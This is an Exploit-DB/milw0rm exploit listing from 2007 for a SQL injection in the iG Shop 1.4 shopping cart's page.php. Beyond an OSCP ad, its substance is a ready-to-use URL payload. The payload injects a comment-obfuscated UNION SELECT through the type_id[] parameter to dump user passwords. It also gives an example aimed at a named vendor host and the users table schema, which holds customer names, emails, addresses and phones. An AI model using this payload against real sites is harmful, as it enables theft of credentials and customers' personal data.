iG Shop 1.4 - 'page.php' SQL Injection

EDB-ID:

3907


Author:

gsy

Type:

webapps


Platform:

PHP

Date:

2007-05-12


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Discovered by: gsy & kerem125
Website: www.kerem125.com

Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html

exploit:/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

example:http://shop.igeneric.co.uk/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, f10

# user_id int(11) NOT NULL auto_increment,
# fname varchar(50) NOT NULL default '',
# lname varchar(50) NOT NULL default '',
# email varchar(100) NOT NULL default '',
# password varchar(100) NOT NULL default '',
# salutation varchar(5) NOT NULL default '',
# bill_address varchar(200) NOT NULL default '',
# bill_address_2 varchar(100) NOT NULL default '',
# bill_city varchar(50) NOT NULL default '',
# bill_post_code varchar(15) NOT NULL default '',
# bill_country varchar(20) NOT NULL default '',
# bill_phone varchar(15) NOT NULL default '',
# ship_address varchar(200) NOT NULL default '',
# ship_address_2 varchar(100) NOT NULL default '',
# ship_city varchar(50) NOT NULL default '',
# ship_post_code varchar(15) NOT NULL default '',
# ship_country varchar(20) NOT NULL default '',
# ship_phone varchar(15) NOT NULL default '',

# milw0rm.com [2007-05-12]